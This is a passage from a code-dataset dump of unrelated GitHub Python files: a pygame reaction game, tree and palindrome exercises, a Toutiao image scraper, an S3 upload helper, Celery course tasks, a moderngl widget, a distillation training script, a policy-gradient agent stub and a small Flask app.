= current_color\n if y_adjustment >= -100:\n reaction_data[\"fail\"][-1][3] -= react_movement_speed\n\n else:\n text_surface = success_font.render(f\"{success_data[-1][2]}ms\", True, current_color)\n text_rect = text_surface.get_rect()\n\n text_rect.center = directions[success_data[-1][0] - 1]\n if current_color != color.background:\n surface.blit(text_surface, text_rect)\n reaction_data[\"success\"][-1][-2] = current_color\n if y_adjustment >= -50:\n reaction_data[\"success\"][-1][3] -= react_movement_speed\n\n return reaction_data\n\n def explosion(coords, particles):\n explode_x = coords[0]\n explode_y = coords[-1]\n shrapnel_exists = True\n shrapnel_speed_x = list(range(-50, 50))\n shrapnel_speed_y = list(range(-50, 50))\n\n for i in range(200):\n explode_speed_x = random.choice(shrapnel_speed_x)\n explode_speed_y = random.choice(shrapnel_speed_y)\n shrapnel_size = random.randint(5, 20)\n\n particles.append([\n [explode_x, explode_y],\n [explode_speed_x, explode_speed_y],\n shrapnel_size,\n shrapnel_exists\n ])\n\n return particles\n\n def anim_explosion(particles, shrapnel_color):\n # index explanation\n # [0][0] [0][1] [explode_x, explode_y],\n # [1][0] [1][1] [explode_speed_x, explode_speed_y],\n # [2] 2 shrapnel_size,\n # [3] 3 shrapnel_exists\n\n for current_particle in particles:\n current_particle[0][0] += current_particle[1][0]\n current_particle[0][1] += current_particle[1][1]\n current_particle[2] -= random.choice([.1, .3, .5, .7, 1])\n current_particle[1][1] += 2\n\n pygame.draw.rect(surface, shrapnel_color,\n (int(current_particle[0][0]),\n int(current_particle[0][1]),\n int(current_particle[2]),\n int(current_particle[2])))\n\n if current_particle[2] <= 0:\n current_particle[3] = False\n\n for current_particle in all_particles:\n if not current_particle[3]:\n all_particles.remove(current_particle)\n return particles\n\n def timer(elapsed_seconds):\n return time_limit - elapsed_seconds\n\n doors = Doors()\n disc = Disc()\n\n while True:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n elif event.type == pygame.KEYDOWN:\n if pygame.key.name(event.key) == \"q\":\n game_over = True\n\n clock.tick(fps)\n surface.fill(color.background)\n\n disc_scored, disc_direction, disc_coord = disc.launch()\n # if disc_scored:\n # disc.disc.x, disc.disc.y = disc.x, disc.y\n # landing = True\n\n\n time_remaining_decimal = round(timer((pygame.time.get_ticks() - timer_marker) / 1000), 2) # precise timer\n time_remaining = int(time_remaining_decimal) # main game timer\n all_particles = anim_explosion(all_particles, disc_explosion_color)\n disc_color_rising, disc_color = disc.ball_pulse(disc_color_rising, disc_color)\n disc.shadow(current_disc_color)\n doors.draw_doors()\n draw_margin(margin_color, margin_return_nominal_state)\n\n # *note: doors.slide_N returns the following: door_N_x, door_N_y, door_N_y_front_side\n # [ball_direction - 1]: 0 - un-launched, 1 - top, 2 - bottom, 3 - left, 4 - right\n chosen_door_coords = [doors.slide_T(),\n doors.slide_B(),\n doors.slide_L(),\n doors.slide_R()][disc_direction - 1]\n\n if landing:\n disc.disc_landing(disc_distance)\n disc_distance -= 48\n if disc_distance < 0:\n disc_distance = 576\n landing = False\n\n if not game_over:\n\n if disc_scored:\n margin_color = color.success_color\n margin_return_nominal_state = 1\n score = disc.score\n react_success = True\n # print(f\"1: {ball.start_mark_close, ball_direction} current/last active door: {doors.last_open}\")\n if disc.start_mark_close > 0:\n current_react_data = build_reaction_data(\n current_react_data,\n react_success,\n disc.start_mark_close,\n disc_direction,\n doors.last_open)\n\n disc.disc.x, disc.disc.y = disc.x, disc.y\n landing = True\n\n else:\n # created to change index when searching chosen_door_coords for either front side or back side\n if (disc_direction - 1) < 2:\n x, y = 0, -1\n else:\n x, y = -1, 1\n\n collision_result_front, collide_location = disc.collision(\n disc_coord[0],\n disc_coord[-1],\n chosen_door_coords[x],\n chosen_door_coords[y])\n\n if not collision_result_front:\n collision_result_back, collide_location = disc.collision(\n disc_coord[0],\n disc_coord[-1],\n chosen_door_coords[0],\n chosen_door_coords[1])\n\n if any([collision_result_front, collision_result_back]):\n\n react_success = False\n # print(f\"0: {ball.start_mark_close, ball_direction} current/last active door: {doors.last_open}\")\n if disc.start_mark_close > 0:\n current_react_data = build_reaction_data(\n current_react_data,\n react_success,\n disc.start_mark_close,\n disc_direction,\n doors.last_open)\n\n lives -= 1\n collisions += 1\n margin_color = color.fail_color\n all_particles = explosion(collide_location, all_particles)\n disc_explosion_color = disc.get_ball_color(current_disc_color)\n\n if lives == 0:\n margin_return_nominal_state = 0\n doors.locked = True\n game_over = True\n\n else:\n margin_return_nominal_state = 0\n disc = Disc()\n disc.rest = 10\n disc.score = score\n\n if time_remaining_decimal < 0:\n margin_return_nominal_state = 0\n doors.locked = True\n game_over = True\n\n if any([margin_color == color.fail_color, margin_color == color.success_color]):\n margin_return_nominal_state += 1\n if margin_return_nominal_state == margin_return_nominal_state_duration:\n margin_color = color.margin_color\n margin_return_nominal_state = 0\n\n accuracy_result = accuracy(score, collisions, doors.get_openings())\n\n if not game_over:\n if not landing:\n current_disc_color = disc.draw_disc(disc_color)\n\n draw_margin(margin_color, margin_return_nominal_state)\n stats(accuracy_result, lives, time_remaining)\n\n else:\n if len(all_particles) <= 1:\n return game_over, accuracy_result, time_remaining, current_react_data\n\n if current_react_data:\n current_react_data = reaction_text(current_react_data)\n\n if score == score_goal:\n if all([doors.rest_T, doors.rest_B, doors.rest_L, doors.rest_R]):\n return game_over, accuracy_result, time_remaining, current_react_data\n\n pygame.display.update()\n","repo_name":"thejourneyville/reactor","sub_path":"reactor/reactor_main_game.py","file_name":"reactor_main_game.py","file_ext":"py","file_size_in_byte":36008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19070680477","text":"\"\"\"\nGiven a binary tree with n nodes, your task is to check if it's possible to partition the tree to two trees which have the equal sum of values after removing exactly one edge on the original tree.\n\nExample 1:\n\nInput:\n 5\n / \\\n 10 10\n / \\\n 2 3\n\nOutput: True\nExplanation:\n 5\n /\n 10\n\nSum: 15\n\n 10\n / \\\n 2 3\n\nSum: 15\nExample 2:\n\nInput:\n 1\n / \\\n 2 10\n / \\\n 2 20\n\nOutput: False\nExplanation: You can't split the tree into two trees with equal sum after removing exactly one edge on the tree.\nNote:\n\nThe range of tree node value is in the range of [-100000, 100000].\n1 <= n <= 10000\n\"\"\"\n\ndef checkEqualTree(root):\n if not root:\n return None\n check = collections.defaultdict(int)\n total = helper(root, check)\n if total == 0:\n return check[0] > 1\n return total % 2 == 0 and total / 2 in check\n\ndef helper(root, check):\n s = root.val\n if root.left:\n s += helper(root.left, check)\n if root.right:\n s += helper(root.right, check)\n check[s] += 1\n return s\n","repo_name":"ntupenn/exercises","sub_path":"medium/663.py","file_name":"663.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38700915093","text":"''' \n今日头条 街拍\n\n'''\nimport requests\nfrom urllib.parse import urlencode\nfrom requests.exceptions import RequestException\nimport json\nfrom bs4 import BeautifulSoup\nimport re\nfrom selenium import webdriver\nfrom ajax_example_config import *\nimport pymongo\nimport os\nfrom hashlib import md5\nfrom multiprocessing import pool\nimport datetime\n\nclient= pymongo.MongoClient(MONGO_URL)\ndb=client[MONGO_DB]\n\ndef get_page_index(offset,keywords):\n data={\n 'offset':offset,\n 'format':'json',\n 'keyword':keywords,\n 'autoload':'true',\n 'count':10,\n 'cur_tab':1,\n 'from':'search_tab'\n }\n try:\n url=\"https://www.toutiao.com/search_content/?\"+urlencode(data);\n headers={'User_Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'}\n response=requests.get(url,headers=headers)\n if response.status_code==200:\n return response.text\n return None\n except RequestException:\n print('请求索引页出错')\n return None\n\ndef parse_page_index(html):\n data=json.loads(html)\n if data and 'data' in data.keys():\n for item in data.get('data'):\n yield item.get('article_url')\n\n\ndef get_page_detail(url):\n try:\n brower=webdriver.PhantomJS();\n brower.get(url)\n return brower.page_source\n except RequestException:\n print('请求索引页出错')\n return None\n\ndef parse_page_detail(url,html):\n soup=BeautifulSoup(html,'lxml')\n title=soup.select('title')[0].get_text()\n images_pattern=re.compile('\"url.*?:(.*?),',re.S)\n result=re.findall(images_pattern,html)\n tu_result=[];\n # print(result)\n date=datetime.datetime.now().strftime('%Y%m%d%H%M%S')\n for index in range(len(result)):\n if index%4==0:\n l=len(result[index])-2\n s=result[index][2:l]\n content=down_load(s.replace(\"\\\\\\/\",\"/\"))\n if content is not None:\n path=save_img(date,content)\n tu_result.append(path);\n return {\n 'title':title,\n 'url':url,\n 'result':tu_result\n }\n\ndef save_to_mongo(result):\n if db[MONGO_TABLE].insert(result):\n print('存储mongo成功')\n return True\n return False\n\n\ndef down_load(url):\n print('正在下载:'+url)\n try:\n response=requests.get(url)\n if response.status_code==200:\n return response.content\n return None\n except RequestException:\n print('请求失败')\n return None\ndef save_img(index,content):\n print('保存图片')\n print(index)\n path='{0}/{1}'.format(os.getcwd()+\"/download_pic\",index)\n if not os.path.exists(path):\n os.makedirs(path)\n new = content.strip() # or new.split()[index]\n hs = md5(str(new).encode()).hexdigest()\n file_path='{0}/{1}.{2}'.format(path,hs ,'jpg')\n if not os.path.exists(file_path):\n with open(file_path,'wb') as f:\n f.write(content)\n f.close()\n return file_path\ndef main(offset):\n html= get_page_index(offset,KEYWORDS)\n for url in parse_page_index(html):\n if url is not None:\n html=get_page_detail(url)\n result=parse_page_detail(url,html)\n if result:save_to_mongo(result)\n\nif __name__==\"__main__\":\n groups=[x*20 for x in range(GROUP_START,GROUP_END+1)]\n pool=pool.Pool()\n pool.map(main,groups)\n","repo_name":"niuyacong/python_spider","sub_path":"example/ajax_example.py","file_name":"ajax_example.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9026607841","text":"import math\n\nimport os\nfrom bawt import log as logging\nfrom bawt.bawt import Bawt\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\nfrom filechunkio import FileChunkIO\n\nLOG = logging.get_logger(__name__)\n\n\nclass S3(Bawt):\n\n def __init__(self):\n super(self.__class__, self).__init__()\n self._aws_access_key = self.aws.get('access_key', None)\n self._aws_secret_key = self.aws.get('secret_key', None)\n\n def connect(self):\n conn = None\n if not self._aws_access_key or not self._aws_secret_key:\n raise Exception('AWS Credentials are not set')\n\n try:\n conn = S3Connection(self._aws_access_key, self._aws_secret_key)\n LOG.debug(\"Successfully connected to S3\")\n\n except Exception as e:\n LOG.critical(str(e))\n return conn\n\n def _get_destination(self, destination):\n return self.camera['destinations'].get(destination, None)\n\n def _create_or_set_bucket(self, bucket):\n conn = self.connect()\n try:\n b = conn.create_bucket(bucket)\n self._bucket = bucket\n except:\n b = conn.get_bucket(bucket)\n return b\n\n def _create_key(self, key_name, bucket):\n b = self._create_or_set_bucket(bucket)\n k = Key(b)\n k.key = key_name\n return k, b\n\n def save_file(self, bucket, file_path):\n file_size = os.stat(file_path).st_size\n file_dir, file_name = os.path.split(file_path)\n\n k, b = self._create_key(file_name, bucket)\n LOG.info(\"Starting S3 file upload. %s to %s\" % (file_path, bucket))\n mp = b.initiate_multipart_upload(file_name)\n chunk_size = 52428800\n chunk_count = int(math.ceil(file_size / float(chunk_size)))\n for i in range(chunk_count):\n offset = chunk_size * i\n _bytes = min(chunk_size, file_size - offset)\n with FileChunkIO(file_path, 'r', offset=offset, bytes=_bytes) as fp:\n mp.upload_part_from_file(fp, part_num=i + 1)\n mp.complete_upload()\n LOG.info(\"Completed S3 file upload. %s to %s\" % (file_path, bucket))\n\n def save_string(self, bucket, name, content):\n \"\"\"\n Save string to S3 bucket\n :param bucket: bucket name\n :param name: remote name for object\n :param content: Contents to save to remote object\n \"\"\"\n LOG.info(\"Starting S3 string upload. %s to %s\" % (name, bucket))\n k, b = self._create_key(name, bucket)\n k.set_contents_from_string(content)\n LOG.info(\"Completed S3 string upload. %s to %s\" % (name, bucket))\n","repo_name":"DoriftoShoes/bawt","sub_path":"bawt/remotes/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4217100350","text":"\"\"\"\nTasks for the courses app\n\"\"\"\nimport logging\n\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom mitol.common.utils.datetime import now_in_utc\n\nfrom courses.models import (\n CourseRun,\n CourseRunEnrollment,\n LearnerProgramRecordShare,\n PaidCourseRun,\n Program,\n)\nfrom main.celery import app\n\nlog = logging.getLogger(__name__)\n\n\n@app.task\ndef sync_courseruns_data():\n \"\"\"\n Task to sync titles and dates for course runs from edX.\n \"\"\"\n from courses.api import sync_course_mode, sync_course_runs\n\n now = now_in_utc()\n runs = CourseRun.objects.live().filter(\n Q(expiration_date__isnull=True) | Q(expiration_date__gt=now)\n )\n\n # `sync_course_runs` logs internally so no need to capture/output the returned values\n sync_course_mode(runs)\n sync_course_runs(runs)\n\n\n@app.task(acks_late=True)\ndef subscribe_edx_course_emails(enrollment_id):\n \"\"\"Task to subscribe user to edX Emails\"\"\"\n from openedx.api import subscribe_to_edx_course_emails\n\n enrollment = CourseRunEnrollment.objects.select_related(\"user\", \"run\").get(\n id=enrollment_id\n )\n\n subscribed = subscribe_to_edx_course_emails(enrollment.user, enrollment.run)\n\n if subscribed:\n enrollment.edx_emails_subscription = subscribed\n enrollment.save()\n\n\n@app.task\ndef generate_course_certificates():\n \"\"\"\n Task to generate certificates for courses.\n \"\"\"\n from courses.api import generate_course_run_certificates\n\n generate_course_run_certificates()\n\n\n@app.task\ndef send_partner_school_email(record_uuid):\n \"\"\"\n Task to send the partner school emails.\n \"\"\"\n from courses.mail_api import send_partner_school_sharing_message\n\n record = LearnerProgramRecordShare.objects.get(share_uuid=record_uuid)\n\n send_partner_school_sharing_message(record)\n\n\n@app.task\ndef clear_unenrolled_paid_course_run(enrollment_id):\n \"\"\"\n Pulls the order specified and clears any PaidCourseRun records for it. If\n these exist, the user won't be able to re-buy into the course later if they\n want to.\n \"\"\"\n from ecommerce.models import Order\n\n try:\n enrollment = CourseRunEnrollment.all_objects.filter(id=enrollment_id).get()\n\n PaidCourseRun.objects.filter(\n user=enrollment.user,\n course_run=enrollment.run,\n order__state=Order.STATE.FULFILLED,\n ).delete()\n except Exception as e:\n log.error(\n f\"Unable to clear paid course run records for enrollment ID {enrollment_id}: {str(e)}\"\n )\n","repo_name":"mitodl/mitxonline","sub_path":"courses/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"29163509367","text":"import sys\n\nsys.path.append(r'F:\\recoding_papers')\n\nimport argparse\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\nfrom glob_params import MNIST_DATASET, logger\nimport os\n\nmnist = read_data_sets(train_dir=MNIST_DATASET, one_hot=True)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--temperature', '-T', type=float, default=-1,\n help='The temperature for DISTILLING.')\nparser.add_argument('--batch_size', '-B', type=int, default=1000,\n help='The batch size of taking images in.')\nparser.add_argument('--epoch_teacher', '-ET', type=int, default=500,\n help='The training epoch for teacher net.')\nparser.add_argument('--epoch_student_individual', '-ESI', type=int, default=500,\n help='The individual training epoch for student net.')\nparser.add_argument('--epoch_student_learning', '-ESL', type=int, default=200,\n help='The learning from teacher training epoch for student net.')\n\nargs = parser.parse_args()\n\nCKPT = os.path.join('.', 'teach.ckpt')\nCKPT_VALID = os.path.join('.', 'checkpoint')\n\n\ndef net(inputs, net_name: str):\n \"\"\"\n Network architecture template.\n :param inputs: Network input\n :param net_name: Network name for var_scope\n :return: Network output\n \"\"\"\n if 'teacher' in net_name:\n num_output = 50\n norm_fn = slim.batch_norm\n do_dropout = False\n elif 'student' in net_name:\n num_output = 30\n norm_fn = slim.batch_norm\n do_dropout = False\n else:\n raise Exception('Unrecognized NET.')\n\n with tf.variable_scope(name_or_scope=net_name, reuse=tf.AUTO_REUSE):\n with slim.arg_scope([slim.fully_connected],\n num_outputs=num_output, normalizer_fn=norm_fn, reuse=False):\n fc1 = slim.fully_connected(inputs=inputs, scope='fc1')\n fc2 = slim.fully_connected(inputs=fc1, scope='fc2')\n output = slim.fully_connected(inputs=fc2,\n num_outputs=10,\n scope='output',\n activation_fn=None,\n normalizer_fn=None)\n if do_dropout:\n output = slim.dropout(inputs=output, keep_prob=0.9)\n return output\n\n\ndef teacher_net(inputs):\n \"\"\"\n Build the Teacher Network.\n :param inputs: Teacher Network inputs\n :return: Teacher Network outputs\n \"\"\"\n return net(inputs=inputs, net_name='teacher')\n\n\ndef student_net(inputs):\n \"\"\"\n Build the Student Network.\n :param inputs: Student Network inputs\n :return: Student Network outputs\n \"\"\"\n return net(inputs=inputs, net_name='student')\n\n\ndef train(temperature: float,\n batch_size: int,\n epoch_teacher: int,\n epoch_student_individual: int,\n epoch_student_learning: int):\n \"\"\"\n Train Teacher and Student Network.\n :param temperature: Temperature for distilling\n :param batch_size: batch size for MNIST\n :param epoch_teacher: Training epoch of Teacher Network\n :param epoch_student_individual: Training epoch of Student Network\n :param epoch_student_learning: Teaching epoch of Student Network\n :return: Enhancement of the accuracy of Student Network\n \"\"\"\n tf.set_random_seed(1)\n tf.reset_default_graph()\n\n if os.path.exists(CKPT_VALID):\n do_train = False\n else:\n do_train = True\n\n do_learn = not do_train\n\n X = tf.placeholder(dtype=tf.float32, shape=[None, 784], name='X')\n Y = tf.placeholder(dtype=tf.float32, shape=[None, 10], name='Y')\n\n output_teacher = teacher_net(X)\n output_student = student_net(X)\n\n loss_teacher = slim.losses.softmax_cross_entropy(logits=output_teacher, onehot_labels=Y, scope='loss_teacher')\n loss_student = slim.losses.softmax_cross_entropy(logits=output_student, onehot_labels=Y, scope='loss_student')\n\n loss_student_learning = temperature ** 2 * slim.losses.mean_squared_error(\n predictions=slim.softmax(output_student / temperature),\n labels=slim.softmax(output_teacher / temperature))\n\n vars = tf.trainable_variables()\n\n vars_teacher = [v for v in vars if 'teacher']\n vars_student = [v for v in vars if 'student']\n\n optimizer = tf.train.AdamOptimizer(learning_rate=0.01)\n sgd_optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01)\n\n opt_teacher = optimizer.minimize(loss_teacher, var_list=vars_teacher)\n opt_student = sgd_optimizer.minimize(loss_student, var_list=vars_student)\n opt_student_learning = optimizer.minimize(loss_student_learning)\n\n correct_prediction_teacher = tf.equal(tf.argmax(Y, 1), tf.argmax(output_teacher, 1))\n correct_prediction_student = tf.equal(tf.argmax(Y, 1), tf.argmax(output_student, 1))\n\n accuracy_teacher = tf.reduce_mean(tf.cast(correct_prediction_teacher, tf.float32))\n accuracy_student = tf.reduce_mean(tf.cast(correct_prediction_student, tf.float32))\n\n init_vars = tf.global_variables_initializer()\n\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n sess.run(init_vars)\n\n if do_train:\n logger.info('Student Net is learning.')\n for cnt in range(epoch_student_individual):\n train_images, train_labels = mnist.train.next_batch(batch_size)\n _, cost_student = sess.run([opt_student, loss_student],\n feed_dict={X: train_images, Y: train_labels})\n if cnt % (epoch_student_individual // 5 + 1) == 0:\n logger.info('Student loss: {}'.format(cost_student))\n acc_student_individual = sess.run(accuracy_student,\n feed_dict={X: mnist.test.images, Y: mnist.test.labels})\n logger.info('Student INDIVIDUAL Accuarcy: {}'.format(acc_student_individual))\n\n logger.info('Teacher Net is learning.')\n for cnt in range(epoch_teacher):\n train_images, train_labels = mnist.train.next_batch(batch_size)\n _, cost_teacher = sess.run([opt_teacher, loss_teacher],\n feed_dict={X: train_images, Y: train_labels})\n\n _, cost_student = sess.run([opt_student, loss_student],\n feed_dict={X: train_images, Y: train_labels})\n if cnt % (epoch_teacher // 5 + 1) == 0:\n logger.info('Teacher loss: {}'.format(cost_teacher))\n acc_teacher = sess.run(accuracy_teacher,\n feed_dict={X: mnist.test.images, Y: mnist.test.labels})\n logger.info('Teacher Accuracy: {}'.format(acc_teacher))\n logger.info('Saving models...')\n saver.save(sess, CKPT)\n\n if do_learn:\n logger.info('Restoring models...')\n saver.restore(sess, CKPT)\n logger.info('Teacher is teaching Student.')\n acc_student_individual = sess.run(accuracy_student,\n feed_dict={X: mnist.test.images, Y: mnist.test.labels})\n logger.info('Student INDIVIDUAL Accuarcy: {}'.format(acc_student_individual))\n for cnt in range(epoch_student_learning):\n train_images, _ = mnist.train.next_batch(batch_size)\n _, cost_student = sess.run([opt_student_learning, loss_student_learning],\n feed_dict={X: train_images})\n if cnt % (epoch_student_learning // 5 + 1) == 0:\n logger.info('Student loss: {}'.format(cost_student))\n acc_student_learning = sess.run(accuracy_student,\n feed_dict={X: mnist.test.images, Y: mnist.test.labels})\n logger.info('Student LEARNING Accuarcy: {}'.format(acc_student_learning))\n enhancement = acc_student_learning - acc_student_individual\n logger.info('Accuaracy gained by: {}'.format(enhancement))\n return enhancement\n\n\nif __name__ == '__main__':\n logger.info(args)\n temperature = args.temperature\n batch_size = args.batch_size\n epoch_teacher = args.epoch_teacher\n epoch_student_individual = args.epoch_student_individual\n epoch_student_learning = args.epoch_student_learning\n\n # If temperature > 0, calculate the enhancement under cmd params; else draw the fig.\n if temperature > 0:\n logger.info('Calc the enhancement.')\n train(temperature, batch_size, epoch_teacher, epoch_student_individual, epoch_student_learning)\n else:\n import numpy as np\n from matplotlib import pyplot as plt\n\n logger.info('Draw the relationship between T and according enhancement.')\n start = 0 if os.path.exists(CKPT_VALID) else 1\n x = np.linspace(-10, 10, num=1000)\n y = list()\n for temperature in x:\n y.append(train(temperature, batch_size, epoch_teacher, epoch_student_individual, epoch_student_learning))\n\n plt.xlabel('T')\n plt.ylabel('Enhancement %')\n y = np.array(y)\n idx = np.where(y == max(y))\n plt.title('MAX E={}%, at T={}'.format(round(float(y[idx] * 100), 4), round(float(x[idx]), 2)))\n plt.plot(x[start:], y * 100)\n plt.savefig('result.png')\n plt.show()\n","repo_name":"wtupc96/Recoding-papers","sub_path":"Distilling_the_knowledge_in_a_Neural_Network/teach_nets_soft_targets.py","file_name":"teach_nets_soft_targets.py","file_ext":"py","file_size_in_byte":9464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5008218556","text":"import numpy as np\nimport moderngl as mgl\n\nfrom mglg.graphics.camera import Camera\nfrom mglg.graphics.drawable import Drawable2D\nfrom mglg.math.vector import Vector4f\n\n\ndef make_fill_verts():\n # 100 pairs (200 total)\n out = np.zeros((200, 2), dtype=np.float32)\n out[:, 0] = np.repeat(np.arange(-0.5, 0.5, 1/100, dtype=np.float32), 2)\n out[::2, 1] = 0.05\n out[1::2, 1] = -0.05\n return out\n\n\nclass FillBar(Drawable2D):\n def __init__(self, context, shader,\n fill_color=1, empty_color=[0, 0, 0, 1],\n *args, **kwargs):\n super().__init__(context, shader, *args, **kwargs)\n\n vertices = np.zeros((200, 4), dtype=np.float32)\n vertices[:, :2] = make_fill_verts()\n vert_vbo = context.buffer(vertices.ravel().view(np.ubyte))\n self.fill_color = Vector4f(fill_color)\n self.empty_color = Vector4f(empty_color)\n self._colors = np.zeros(200, dtype=[('color', np.float32, 4)])\n self._colors['color'][:] = fill_color\n self._pending_percentage = self._percentage = self.percentage = 100\n self._dirty_percentage = False\n\n self._color_vbo = context.buffer(self._colors.view(np.ubyte), dynamic=True)\n self.vao = context.vertex_array(shader,\n [\n (vert_vbo, '4f', 'vertices'),\n (self._color_vbo, '4f', 'color')\n ])\n\n def draw(self, camera: Camera):\n if self.visible:\n if self._percentage != self._pending_percentage:\n self.update_fill_color(self._pending_percentage)\n self._color_vbo.write(self._delta_view, offset=self._offset)\n np.dot(self.model_matrix, camera.vp, self.mvp)\n self.shader['mvp'].write(self._mvp_ubyte_view)\n self.vao.render(mgl.TRIANGLE_STRIP)\n\n @property\n def percentage(self):\n return self._percentage\n\n @percentage.setter\n def percentage(self, value):\n if value > 100 or value < 0:\n raise ValueError('Invalid percentage.')\n self._pending_percentage = int(value)\n\n def update_fill_color(self, new_percentage):\n old_percentage = self._percentage\n delta = new_percentage - old_percentage\n op2, np2 = old_percentage*2, new_percentage*2\n if delta > 0: # moving division to right (filling up)\n self._colors['color'][op2:np2] = self.fill_color\n slc = slice(op2, np2, None)\n else: # moving division to left (filling down)\n self._colors['color'][np2:op2 + 1] = self.empty_color\n slc = slice(np2, op2+1, None)\n self._delta_view = self._colors[slc].view(np.ubyte)\n self._offset = slc.start * 16\n self._percentage = new_percentage\n\n\nif __name__ == '__main__':\n from mglg.graphics.shaders import VertexColorShader\n from gonogo.visuals.window import ExpWindow as Win\n from time import sleep\n\n win = Win()\n per_vert = VertexColorShader(win.context)\n fill_bar = FillBar(win.context, per_vert, fill_color=[0.3, 0.8, 0.2, 1],\n empty_color=[0.2, 0.2, 0.2, 1], scale=1, rotation=90)\n for i in range(100):\n fill_bar.percentage -= 1\n fill_bar.draw(win.cam)\n win.flip()\n for i in range(100):\n fill_bar.percentage += 1\n fill_bar.draw(win.cam)\n win.flip()\n sleep(0.4)\n","repo_name":"aforren1/go-no-go","sub_path":"gonogo/visuals/fill_bar.py","file_name":"fill_bar.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26000712162","text":"import logging\n\nlogger = logging.getLogger('root')\n\nfrom copy import deepcopy\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\n\nfrom abp.adaptives.common.memory import Memory, Experience\nfrom abp.utils import clear_summary_path\nfrom abp.models import ActorModel\nfrom tensorboardX import SummaryWriter\n\nfrom baselines.common.schedules import LinearSchedule\n\n# TODO Too many duplicate code. Need to refactor!\n\nclass PGAdaptive(object):\n \"\"\"PGAdaptive using Vanilla Policy Gradient\"\"\"\n\n def __init__(self, name, choices, network_config, reinforce_config):\n super(PGAdaptive, self).__init__()\n self.name = name\n self.choices = choices\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.update_frequency = reinforce_config.update_frequency\n\n self.replay_memory = Memory(self.reinforce_config.batch_size)\n\n self.steps = 0\n self.total_reward = 0\n\n self.previous_state = None\n self.previous_action = None\n self.clear_rewards()\n\n self.model = ActorModel(self.name + \"_actor\", self.network_config)\n self.summary = SummaryWriter(log_dir = self.reinforce_config.summaries_path + \"/\" + self.name)\n\n self.episode = 0\n self.epsilon_schedule = LinearSchedule(10 * 1000, initial_p = self.reinforce_config.starting_epsilon, final_p = 0.1)\n\n def __del__(self):\n self.summary.close()\n\n def predict(self, state):\n self.steps += 1\n\n\n if self.previous_state is not None and self.previous_action is not None:\n self.replay_memory.add((self.previous_state, self.previous_action, self.current_reward, state, False))\n\n _state = Variable(torch.Tensor(state)).unsqueeze(0)\n action_probs = self.model.predict(_state)\n\n #TODO continuous action\n m = Categorical(action_probs)\n action = m.sample()\n\n choice = self.choices[action]\n\n self.update()\n\n self.clear_rewards()\n\n self.previous_state = state\n self.previous_action = action\n\n return choice, q_values\n\n\n def disable_learning(self):\n logger.info(\"Disabled Learning for %s agent\" % self.name)\n self.model.save_network()\n self.episode = 0\n\n\n def end_episode(self, state):\n if not self.learning:\n return\n\n logger.info(\"End of Episode %d with total reward %.2f\" % (self.episode + 1, self.total_reward))\n\n self.episode += 1\n\n self.summary.add_scalar(tag='%s agent reward' % self.name,scalar_value=self.total_reward,\n global_step=self.episode)\n\n self.replay_memory.add((self.previous_state, self.previous_action, self.reward_list(), state, True))\n\n self.clear_rewards()\n self.total_reward = 0\n\n self.previous_state = None\n self.previous_action = None\n\n self.update()\n\n def clear_rewards(self):\n self.current_reward = 0\n\n def reward(self, value):\n self.current_reward += value\n self.total_reward += value\n\n def update(self):\n if self.steps <= self.reinforce_config.batch_size:\n return\n\n states, actions, reward, next_states, is_terminal, weights, batch_idxes = self.replay_memory.sample(self.reinforce_config.batch_size,\n self.beta_schedule.value(self.steps))\n states = Variable(torch.Tensor(states))\n next_states = Variable(torch.Tensor(next_states))\n\n is_terminal = [0 if t else 1 for t in is_terminal]\n\n self.replay_memory.clear()\n\n self.model.fit(states, q_target, self.steps)\n\n return td_errors\n","repo_name":"osu-xai/abp","sub_path":"abp/adaptives/pg/adaptive.py","file_name":"adaptive.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21053000541","text":"from flask import Flask, jsonify\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\n\ndef get_db():\n client = MongoClient(host='database',\n port=27017)\n db = client[\"users\"]\n return db\n\n@app.route(\"/\")\ndef hello():\n return \"Hello, go to /users to see all users!\"\n\n@app.route('/users')\ndef get_users():\n db = get_db()\n _users = db.users.find()\n users = [{ \"name\": user[\"name\"], \"last_name\": user[\"last_name\"]} for user in _users]\n return jsonify({\"users\": users})\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=3001)\n","repo_name":"jtowarnicka/docker-exercises","sub_path":"docker-compose/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3086022484","text":"# O(n) Time | O(n) Space\ndef isPalindrome(string):\n \"\"\"\n Write a function that takes in a non-empty string and that returns a boolean representing whether the string is a\n palindrome.\n \"\"\"\n if string[::-1] == string:\n return True\n return False\n\n\n# O(n) Time | O(1) space\n# Takes advantage of the fact that's letter is equal to respective last letter, like a mirror reflection.\ndef isPalindromeBetter(string):\n start = 0\n end = len(string) - 